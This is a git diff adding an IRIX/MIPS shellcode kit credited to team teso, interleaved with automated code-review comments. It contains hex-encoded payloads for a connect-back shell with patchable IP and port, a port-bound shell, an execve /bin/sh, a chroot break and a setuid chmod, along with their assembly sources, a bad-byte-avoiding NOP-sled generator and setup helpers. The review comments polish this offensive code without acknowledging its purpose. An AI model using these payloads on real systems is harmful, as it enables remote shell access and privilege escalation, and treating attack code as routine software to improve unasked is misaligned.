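Review bot: This file is a superseded copy of execvesh.s kept under a `-backup` suffix; nothing in hppa_hpux/Makefile or build.sh assembles or references it, and `clean` does not know about it either, so it is dead weight that will drift further from the live file with every edit. Version control already preserves earlier revisions, so drop it; if it is kept because it records a deliberately abandoned approach (the `.PROC`/`.CALLINFO` framing and the `ldo 0xb(%r0),%r22` variant differ from the live file), give it a header comment saying why it was abandoned so the next reader does not try to "restore" it.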
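--- /dev/null
+++ b/other/shellkit/mips.c
@@ -0,0 +1,143 @@
+/* mips.c - generic mips functions
+ *
+ * by team teso
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "shellcode.h"
+#include "mips.h"
+
+static unsigned long int mips_nop_rwreg (void);
+static unsigned long int mips_nop_roreg (void);
+static unsigned long int mips_nop_xfer (char *xferstr);
+
+/* mips generic isa "nop" space generator
+ */
+
+/* get random read write register (i.e. not sp, everything else allowed)
+ */
+static unsigned long int
+mips_nop_rwreg (void)
+{
+ unsigned long int reg;
+
+ do {
+ reg = random_get (0, 31);
+ } while (reg == 29); /* 29 = $sp */
+
+ return (reg);
+}
+
+
+static unsigned long int
+mips_nop_roreg (void)
+{
+ return (random_get (0, 31));
+}
+
+
+static unsigned long int
+mips_nop_xfer (char *xferstr)
+{
+ int bw = 0; /* bitfield walker */
+ unsigned long int tgt; /* resulting instruction */
+
+ /* in a valid xferstr we trust */
+ for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
+ switch (xferstr[0]) {
+ case ('0'):
+ BSET (tgt, 1, 0, bw);
+ break;
+ case ('1'):
+ BSET (tgt, 1, 1, bw);
+ break;
+ case ('r'):
+ BSET (tgt, 5, mips_nop_roreg (), bw);
+ break;
+ case ('w'):
+ BSET (tgt, 5, mips_nop_rwreg (), bw);
+ break;
+ case ('c'):
+ BSET (tgt, 16, random_get (0, 0xffff), bw);
+ break;
+ case ('.'):
+ break; /* ignore */
+ default:
+ fprintf (stderr, "on steroids, huh?\n");
+ exit (EXIT_FAILURE);
+ break;
+ }
+ }
+
+ if (bw != 32) {
+ fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
+ exit (EXIT_FAILURE);
+ }
+
+ return (tgt);
+}
+
+
+unsigned int
+mips_nop (unsigned char *dest, unsigned int dest_len,
+ unsigned char *bad, int bad_len)
+{
+ int walk;
+ int bcount; /* bad counter */
+ char * xs;
+ char * xferstr[] = {
+ "000000.r.r.w.00000.000100", /* sllv rs rt rd */
+ "000000.r.r.w.00000.000110", /* srlv rs rt rd */
+ "000000.r.r.w.00000.000111", /* srav rs rt rd */
+ "000000.r.r.w.00000.100001", /* addu rs rt rd */
+ "000000.r.r.w.00000.100011", /* subu rs rt rd */
+ "000000.r.r.w.00000.100100", /* and rs rt rd */
+ "000000.r.r.w.00000.100101", /* or rs rt rd */
+ "000000.r.r.w.00000.100110", /* xor rs rt rd */
+ "000000.r.r.w.00000.100111", /* nor rs rt rd */
+ "000000.r.r.w.00000.101010", /* slt rs rt rd */
+ "000000.r.r.w.00000.101011", /* sltu rs rt rd */
+ "001001.r.w.c", /* addiu rs rd const */
+ "001010.r.w.c", /* slti rs rd const */
+ "001011.r.w.c", /* sltiu rs rd const */
+ "001100.r.w.c", /* andi rs rd const */
+ "001101.r.w.c", /* ori rs rd const */
+ "001110.r.w.c", /* xori rs rd const */
+ "001111.00000.w.c", /* lui rd const */
+ NULL,
+ };
+ unsigned long int tgt;
+
+ if (dest_len % 4) {
+ fprintf (stderr, "off by %d padding of dest_len (= %u), rounding down\n",
+ dest_len % 4, dest_len);
+ dest_len -= (dest_len % 4);
+ }
+
+ for (walk = 0 ; dest_len > 0 ; dest_len -= 4 , walk += 4) {
+ /* avoid endless loops on excessive badlisting */
+ for (bcount = 0 ; bcount < 16384 ; ++bcount) {
+ xs = xferstr[random_get (0, 17)];
+ tgt = mips_nop_xfer (xs);
+
+ dest[walk + 0] = (tgt >> 24) & 0xff;
+ dest[walk + 1] = (tgt >> 16) & 0xff;
+ dest[walk + 2] = (tgt >> 8) & 0xff;
+ dest[walk + 3] = tgt & 0xff;
+ if (badstr (&dest[walk], 4, bad, bad_len) == 0)
+ break;
+ }
+
+ /* should not happen */
+ if (bcount >= 16384) {
+ fprintf (stderr, "too much blacklisting, giving up...\n");
+ exit (EXIT_FAILURE);
+ }
+ }
+
+ return (walk);
+}
+
+
+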
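Review bot: `xs = xferstr[random_get (0, 17)];` on line 121 hard-codes the last valid index of the `xferstr` table, so adding or removing a pattern silently skews which encodings are drawn, and one entry fewer hands the `NULL` sentinel to `mips_nop_xfer`, which then exits with "invalid bitwalker" instead of failing at the call site. Derive the bound from the table, `xs = xferstr[random_get (0, (sizeof xferstr / sizeof xferstr[0]) - 2)];`, on the assumption (not verifiable here) that `random_get` is inclusive at both ends as the `(0, 31)` register draws in mips_nop_rwreg suggest; once that is in place the `NULL` terminator is redundant. The `16384` retry cap appears twice (lines 120 and 133) and should be one named constant. The table holds string literals and should be `const char *`, with `mips_nop_xfer` taking `const char *` to match; `BSET` is defined outside this file, so its contract (that it advances `bw` by the width argument, which the `bw != 32` check relies on) is worth a comment at the top of mips_nop_xfer.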
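--- /dev/null
+++ b/other/shellkit/mips.h
@@ -0,0 +1,19 @@
+
+#ifndef MIPS_H
+#define MIPS_H
+
+/* mips_nop
+ *
+ * create `dest_len' bytes of nopspace at `dest', which does not contain any
+ * of the bytes in `bad', which is a char array, `bad_len' in size
+ *
+ * return number of bytes generated
+ */
+
+unsigned int
+mips_nop (unsigned char *dest, unsigned int dest_len,
+ unsigned char *bad, int bad_len);
+
+#endif
+
+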
diff --git a/other/shellkit/mips.o b/other/shellkit/mips.o
new file mode 100644
index 0000000..7f753ca
--- /dev/null
+++ b/other/shellkit/mips.o
Binary files differ
diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c
new file mode 100644
index 0000000..33bf38c
--- /dev/null
+++ b/other/shellkit/mips_irix.c
@@ -0,0 +1,231 @@
1
2#include <stdio.h>
3#include <stdlib.h>
4#include <string.h>
5#include "shellcode.h"
6#include "mips.h"
7
8
9/* tested on: IP20 R4000 6.5
10 */
11shellcode mips_irix_chmod = {
12 "mips-irix-chmod",
13 64,
14 "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55"
15 /* ^^ ^^ = uid ^ 0x5555 */
16 "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80"
17 /* ^^ ^^ = gid ^ 0x5555 */
18 "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8"
19 /* ^^ ^^ = length of appended pathname + 0xfeb8 */
20 "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7"
21 "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c"
22 "\x24\x18\x72\xec",
23};
24
25/* tested on: IP20 R4000 6.5
26 */
27shellcode mips_irix_chroot = {
28 "mips-irix-chroot",
29 84,
30 "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e"
31 "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0"
32 "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c"
33 "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11"
34 "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c"
35 "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26"
36 "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50",
37};
38
39/* tested on: IP20 R4000 6.5
40 */
41shellcode mips_irix_connectsh = {
42 "mips-irix-connectsh",
43 172,
44 "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
45 "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
46 "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
47 "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42"
48 /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */
49 "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8"
50 /* ^^ ^^ ip .3.4 */
51 "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23"
52 "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2"
53 "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee"
54 "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff"
55 "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c"
56 "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc"
57 "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20"
58 "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8"
59 "\x24\x02\x04\x23\x01\x01\x01\x0c"
60 "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
61};
62
63/* tested on: IP20 R4000 6.5
64 */
65shellcode mips_irix_execvesh = {
66 "mips-irix-execvesh",
67 48,
68 "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc"
69 "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
70 "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23"
71 "\x01\x01\x01\x0c"
72 "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
73};
74
75shellcode mips_irix_exit = {
76 "mips-irix-exit",
77 16,
78 "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c"
79 "\x24\x18\x73\x50",
80};
81
82/* tested on: IP20 R4000 6.5
83 * IP30 R10000 6.5.7m (thanks oxigen ;)
84 */
85shellcode mips_irix_portshellsh = {
86 "mips-irix-portshellsh",
87 188, /* yay! well optimized */
88 "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
89 "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
90 "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
91 "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */
92 "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0"
93 "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c"
94 "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec"
95 "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c"
96 "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03"
97 "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff"
98 "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26"
99 "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6"
100 "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8"
101 "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
102 "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c"
103 "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
104};
105
106/* tested on: IP20 R4000 6.5
107 */
108shellcode mips_irix_read = {
109 "mips-irix-read",
110 56,
111 "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31"
112 "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb"
113 "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10"
114 "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f"
115 "\x01\x01\x01\x0c\x24\x18\x73\x50",
116};
117
118shellcode mips_irix_setgid = {
119 "mips-irix-setgid",
120 16,
121 "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */
122 "\x01\x01\x01\x0c",
123};
124
125shellcode mips_irix_setreuid = {
126 "mips-irix-setreuid",
127 24,
128 "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55"
129 /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */
130 "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c",
131};
132
133
134shellcode * mips_irix_shellcodes[] = {
135 &mips_irix_chmod,
136 &mips_irix_chroot,
137 &mips_irix_connectsh,
138 &mips_irix_execvesh,
139 &mips_irix_exit,
140 &mips_irix_portshellsh,
141 &mips_irix_read,
142 &mips_irix_setgid,
143 &mips_irix_setreuid,
144 NULL,
145};
146
147
148arch mips_irix = {
149 "mips-irix",
150 4,
151 mips_nop,
152 mips_irix_shellcodes,
153};
154
155
156
157/* set the uid, gid and pathname of the mips-irix-chmod code at `code'
158 * XXX: be sure to have strlen(pathname) bytes left after code
159 */
160void
161mips_irix_chmod_setup (unsigned char *code, char *pathname,
162 unsigned short int uid, unsigned short int gid)
163{
164 unsigned short int len = 0xfeb8;
165
166 uid ^= 0x5555;
167 code[6] = (uid >> 8) & 0xff;
168 code[7] = uid & 0xff;
169
170 gid ^= 0x5555;
171 code[14] = (gid >> 8) & 0xff;
172 code[15] = gid & 0xff;
173
174 len += strlen (pathname);
175 code[26] = (len >> 8) & 0xff;
176 code[27] = len & 0xff;
177
178 memcpy (code + 64, pathname, strlen (pathname));
179
180 return;
181}
182
183
184/* ip and port in network byte order
185 */
186void
187mips_irix_connectsh_setup (unsigned char *code,
188 unsigned long int ip, unsigned short int port)
189{
190 code[38] = (port >> 8) & 0xff;
191 code[39] = port & 0xff;
192
193 code[46] = (ip >> 24) & 0xff;
194 code[47] = (ip >> 16) & 0xff;
195 code[50] = (ip >> 8) & 0xff;
196 code[51] = ip & 0xff;
197
198 return;
199}
200
201
202/* set the gid within the 'mips-irix-setgid' code at `code'
203 */
204void
205mips_irix_setgid_setup (unsigned char *code, unsigned short int gid)
206{
207 gid ^= 0x5555;
208
209 code[2] = (gid >> 8) & 0xff;
210 code[3] = gid & 0xff;
211
212 return;
213}
214
215
216void
217mips_irix_setreuid_setup (unsigned char *code,
218 unsigned short int ruid, unsigned short int euid)
219{
220 ruid ^= 0x5555;
221 code[2] = (ruid >> 8) & 0xff;
222 code[3] = ruid & 0xff;
223
224 euid ^= 0x5555;
225 code[6] = (euid >> 8) & 0xff;
226 code[7] = euid & 0xff;
227
228 return;
229}
230
231
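Review bot: `mips_irix_chmod_setup` (lines 160–181) and `mips_irix_connectsh_setup` (186–199) are defined here but mips_irix.h declares only the setgid and setreuid setup functions, so any other translation unit calling them relies on an implicit declaration; add the two prototypes to the header. Inside `mips_irix_chmod_setup` the append offset `64` at line 178 duplicates `mips_irix_chmod.code_len`, so the two can drift apart if the code array is edited; `memcpy (code + mips_irix_chmod.code_len, pathname, strlen (pathname));` keeps them tied. The `unsigned short int len = 0xfeb8; len += strlen (pathname);` at lines 164 and 174 wraps silently for a long pathname, and the function has no way to report that, so the comment at 157–159 should state the limit or the function should check `strlen (pathname)` and refuse.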
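diff --git a/other/shellkit/mips_irix.h b/other/shellkit/mips_irix.h
new file mode 100644
index 0000000..68c633a
--- /dev/null
+++ b/other/shellkit/mips_irix.h
@@ -0,0 +1,17 @@
+
+#ifndef MIPS_IRIX_H
+#define MIPS_IRIX_H
+
+#include "shellcode.h"
+
+arch mips_irix;
+
+void
+mips_irix_setgid_setup (unsigned char *code, unsigned short int gid);
+
+void
+mips_irix_setreuid_setup (unsigned char *code,
+ unsigned short int ruid, unsigned short int euid);
+
+#endif
+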
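Review bot: `arch mips_irix;` at line 7 is a tentative definition rather than a declaration, so every translation unit that includes this header defines the object; that only links through common symbols and fails outright under `-fno-common`, which is the GCC 10+ default. It should read `extern arch mips_irix;`, with the initialised definition staying in mips_irix.c. The same pattern is in sparc_solaris.h (`arch sparc_solaris;`) and, given how shellkit.h includes them, presumably in the hppa_hpux and x86 headers too. This header also lacks prototypes for `mips_irix_chmod_setup` and `mips_irix_connectsh_setup`, which mips_irix.c defines.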
diff --git a/other/shellkit/mips_irix.o b/other/shellkit/mips_irix.o
new file mode 100644
index 0000000..b5313da
--- /dev/null
+++ b/other/shellkit/mips_irix.o
Binary files differ
diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile
new file mode 100644
index 0000000..a68d231
--- /dev/null
+++ b/other/shellkit/mips_irix/Makefile
@@ -0,0 +1,22 @@
1
2#DFLAGS=-O2
3DFLAGS=-g -ggdb
4CC=gcc
5CFLAGS=$(DFLAGS) -Wall -DIRIX
6
7all:
8 $(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s
9 $(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s
10 $(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s
11 $(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s
12 $(CC) $(CFLAGS) -o exit ../codedump.c exit.s
13 $(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s
14 $(CC) $(CFLAGS) -o read ../codedump.c read.s
15 $(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s
16 $(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s
17
18clean:
19 rm -f code.h codetest \
20 chmod chroot connectsh execvesh exit portshellsh read \
21 setgid setreuid
22
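Review bot: the `clean` rule at lines 18–21 removes `code.h` and `codetest`, which no rule in this Makefile produces, so either those names are stale or the rule that builds them is missing. `all` and `clean` are not declared phony, so a file named `clean` in the directory would silently stop the target; add `.PHONY: all clean`. The nine near-identical build lines could also be a pattern rule, but that is a style choice.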
diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README
new file mode 100644
index 0000000..a78c668
--- /dev/null
+++ b/other/shellkit/mips_irix/README
@@ -0,0 +1,25 @@
1
2mips/irix shellcodes
3some comments in this file
4
5
6for execvesh and portshellsh append "/bin/sh\x42" to the code.
7
8if you want to execute something different than "/bin/sh", be sure to properly
9set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop
10and adjust the self-relocation.
11
12the codedump utility build extra cache control syscalls, so it flushes all
13caches properly and you can run the code safily then from a flushed cache.
14
15example:
16
17scut@hyperion $ make >/dev/null
18scut@hyperion $ ./execvesh
19 <... dumps the hexcode ...>
20scut@hyperion $ ./execvesh exec
21len = 68
22$
23$ exit
24scut@hyperion $
25
diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s
new file mode 100644
index 0000000..181c123
--- /dev/null
+++ b/other/shellkit/mips_irix/chmod.s
@@ -0,0 +1,49 @@
1/* MIPS/IRIX PIC chmod code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17 /* FIXME: its not workable atm */
18cbegin:
19 .set noreorder
20 .set nomacro
21
22lbl: bltzal zero, lbl
23
24 li a1, 0x4141 /* a1 = uid ^ 0x5555 */
25 xor a1, a1, 0x5555
26 li a2, 0x4242 /* a2 = gid ^ 0x5555 */
27 xor a2, a2, 0x555
28
29 addu a0, ra, 0x0180
30 sb zero, -(0x0148 + -(9))(a0)
31 subu a0, a0, 0x0148
32
33 /* chown (a0 = pathname, a1 = uid, a2 = gid) */
34 li v0, SYS_chown /* 0x03f8 */
35 syscall
36
37 /* chmod (a0 = pathname, a1 = 04755) */
38 li a1, 0x09ed /* a1 = 04755 = 0x09ed */
39 li v0, SYS_chmod /* 0x03f7 */
40 syscall
41
42 li v0, SYS_exit /* 0x03e9 */
43 syscall
44 li t8, 0x72ec /* sane ds */
45
46 .end cbegin
47cend:
48
49 /* XXX: append pathname here, will get NUL terminated */
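Review bot: the `/* FIXME: its not workable atm */` at line 17 contradicts the `tested on: IP20 R4000 6.5` comment attached to `mips_irix_chmod` in mips_irix.c, so one of the two is stale and a reader of the C table has no way to know this entry is flagged. Either carry the same FIXME on the C-side entry or drop it here once the status is settled. Line 30, `sb zero, -(0x0148 + -(9))(a0)`, would be easier to audit with the two offsets given symbolic names, as `/* a0 = ra + 0x0180 */` style comments do elsewhere in the file.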
diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s
new file mode 100644
index 0000000..96a1595
--- /dev/null
+++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
1/* MIPS/IRIX PIC chroot break
2 * without 0x00, 0x0a, 0x0d, 0x25
3 *
4 * -sc.
5 */
6
7#include <sgidefs.h>
8#include <sys/regdef.h>
9#include <sys/asm.h>
10#include <sys.s>
11#include <sys/syscall.h>
12
13 .section .text
14
15 .globl cbegin
16 .globl cend
17
18cbegin:
19 .set noreorder
20 .set nomacro
21
22foo: bltzal zero, foo
23 li a1, 0700 /* a1 = 0700 permission */
24
25 /* mkdir ("Y..", 0700);
26 */
27 lui t2, 0x592e
28 ori t2, 0x2cff /* t1 = "Y..\x00" */
29 add t2, t2, 0x0101
30 sw t2, -48(ra)
31
32 subu a0, ra, 48 /* a0 = "Y.." */
33 li v0, SYS_mkdir /* 0x0438 */
34 syscall
35
36 /* chroot ("Y..");
37 * a0 still points to it
38 */
39 addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */
40 syscall
41
42 /* chdir ("..") a few times
43 */
44 li s2, 0x1211 /* 12 times chdir ("..") */
45
46foo2: subu a0, ra, 47 /* "..\x00" */
47 li v0, SYS_chdir /* 0x03f4 */
48 syscall
49 sub s2, 0x0101
50 bgez s2, foo2
51
52 addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */
53 subu a0, ra, 46 /* ".\x00" */
54 syscall
55 li t2, 0x7350 /* NOP */
56
57 .end cbegin
58cend:
59 nop
60
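Review bot: the comment on line 28, `/* t1 = "Y..\x00" */`, names `t1` while the instruction writes `t2`, and `t2` is the register stored at line 30; the comment should read `t2`. Lines 46 and 53 describe `"..\x00"` and `".\x00"` as suffixes of the same four-byte word stored at line 30, which is worth one sentence of explanation above line 27 so the `-48`/`-47`/`-46` offsets can be checked against each other.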
diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s
new file mode 100644
index 0000000..7b77d4e
--- /dev/null
+++ b/other/shellkit/mips_irix/connectsh.s
@@ -0,0 +1,109 @@
1/* MIPS/IRIX PIC connect shell shellcode
2 * no 0x00, 0x0a, 0x0d, 0x25 bytes
3 *
4 * -sc
5 */
6
7 /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
8
9#include <sgidefs.h>
10#include <sys/regdef.h>
11#include <sys/asm.h>
12#include <sys.s>
13#include <sys/syscall.h>
14#include <elf.h>
15
16 .section .text
17
18 .globl cbegin
19 .globl cend
20
21cbegin:
22 .set noreorder
23 .set nomacro
24
25 /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
26 */
27 li s6, 0x7350
28 subu a0, s6, 0x734e /* AF_INET = 2 */
29 subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
30 subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
31 li v0, SYS_socket /* 0x0453 */
32 syscall
33
34 /* socket returned in v0, save to a0
35 */
36 andi a0, v0, 0xffff /* a0 = socket */
37
38 /* build struct sockaddr_in
39 * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000
40 */
41 subu t2, s6, 0x734e /* t2 = 0x0002 */
42 sh t2, -16(sp)
43 li t2, 0x4141 /* t2 = port number */
44 sh t2, -14(sp)
45
46 /* ip address */
47 lui t2, 0x4142
48 ori t2, t2, 0x4344
49 sw t2, -12(sp)
50
51 sw zero, -8(sp)
52 sw zero, -4(sp)
53
54 /* connect (socket, (struct sockaddr *) cs,
55 * sizeof (struct sockaddr_in)
56 */
57 subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
58 subu a1, sp, a2 /* a1 = (struct sockaddr *) */
59 li v0, SYS_connect /* 0x0443 */
60 syscall
61
62 /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
63 */
64 subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
65
66 /* socket returned in v0, save in s7
67 */
68 andi s7, a0, 0xffff
69
70 /* dup is emulated through close and fcntl, since irix offers no
71 * native dup syscall as for example linux. see phrack 56 for details
72 */
73dup_loop:
74 andi a0, s3, 0x0103 /* a0 = STD*_FILENO */
75 li v0, SYS_close /* 0x03ee */
76 syscall
77
78 andi a0, s7, 0xffff /* a0 = socket */
79 slti a1, zero, -1 /* a1 = 0 */
80 andi a2, s3, 0x0103 /* a2 = STD*_FILENO */
81 li v0, SYS_fcntl /* 0x0426 */
82 syscall
83
84 subu s3, 0x1011
85 bgez s3, dup_loop
86
87 /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
88 */
89 sw zero, -4(sp)
90
91 /* a2 (envp) is already zero due to the dup_loop
92 */
93gaddr: bltzal zero, gaddr /* rock on-. lsd */
94 subu a1, sp, 8
95
96 /* ra contains the proper address now */
97 addu ra, ra, 0x0120 /* add 32 + 0x0100 */
98
99 add a0, ra, -(8 + 0x100)
100 sb zero, -(1 + 0x100)(ra) /* store NUL */
101 sw a0, -8(sp)
102 li v0, SYS_execve
103 syscall
104
105 .end cbegin
106cend:
107
108 /* XXX append here: "/bin/sh\x42" */
109
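Review bot: the comment at lines 66–67, `socket returned in v0, save in s7`, does not match line 68, `andi s7, a0, 0xffff`, which copies from `a0`; the same comment in portshellsh.s describes an `andi s7, v0, 0xffff`, so this one looks copied over without being updated. Since `a0` was loaded with the socket at line 36, the comment should say `socket still in a0, save in s7`.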
diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s
new file mode 100644
index 0000000..89fd45b
--- /dev/null
+++ b/other/shellkit/mips_irix/execvesh.s
@@ -0,0 +1,36 @@
1/* MIPS/IRIX PIC execve code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 sw zero, -4(sp)
22foo: bltzal zero, foo
23 lw a2, -4(sp)
24
25 addu ra, ra, 0x0124 /* add 36 + 0x0100 */
26
27 add a0, ra, -(8 + 0x100)
28 sb zero, -(1 + 0x100)(ra)
29 sw a0, -8(sp)
30 subu a1, sp, 8
31 li v0, SYS_execve
32 syscall
33
34 .end cbegin
35cend:
36
diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s
new file mode 100644
index 0000000..aef7d01
--- /dev/null
+++ b/other/shellkit/mips_irix/exit.s
@@ -0,0 +1,29 @@
1/* MIPS/IRIX PIC exit code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 /* _exit (0) */
22 slti a0, zero, -1
23 li v0, SYS_exit /* 0x03e9 */
24 syscall
25 li t8, 0x7350
26
27 .end cbegin
28cend:
29
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s
new file mode 100644
index 0000000..18070f6
--- /dev/null
+++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
1/* MIPS/IRIX PIC listening port shellcode
2 * no 0x00, 0x0a, 0x0d, 0x25 bytes
3 *
4 * bind a shell to tcp port 0x4141
5 *
6 * 2001/05/25 optimized from 368 down to 188 bytes -sc.
7 *
8 */
9
10 /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
11
12#include <sgidefs.h>
13#include <sys/regdef.h>
14#include <sys/asm.h>
15#include <sys.s>
16#include <sys/syscall.h>
17#include <elf.h>
18
19 .section .text
20
21 .globl cbegin
22 .globl cend
23
24cbegin:
25 .set noreorder
26 .set nomacro
27
28 /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
29 */
30 li s6, 0x7350
31 subu a0, s6, 0x734e /* AF_INET = 2 */
32 subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
33 subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
34 li v0, SYS_socket /* 0x0453 */
35 syscall
36
37 /* socket returned in v0, save to a0
38 */
39 andi a0, v0, 0xffff /* a0 = socket */
40
41 /* build struct sockaddr_in
42 * 0x0002port 0x00000000 0x00000000 0x00000000
43 */
44 subu t2, s6, 0x734e /* t2 = 0x0002 */
45 sh t2, -16(sp)
46 li t2, 0x4141 /* t2 = port number */
47 sh t2, -14(sp)
48 sw zero, -12(sp)
49 sw zero, -8(sp)
50 sw zero, -4(sp)
51
52 /* bind (socket, (struct sockaddr *) srv_addr,
53 * sizeof (struct sockaddr_in)
54 */
55 subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
56 subu a1, sp, a2 /* a1 = (struct sockaddr *) */
57 li v0, SYS_bind /* 0x0442 */
58 syscall
59
60 /* listen (socket, backlog)
61 * XXX: is it safe here to make backlog = pointer-on-the-stack ?
62 * should be, since its still a positive number
63 */
64/* subu a1, s6, 0x7340 *//* a1 = backlog = 0x10 */
65 li v0, SYS_listen /* 0x0448 */
66 syscall
67
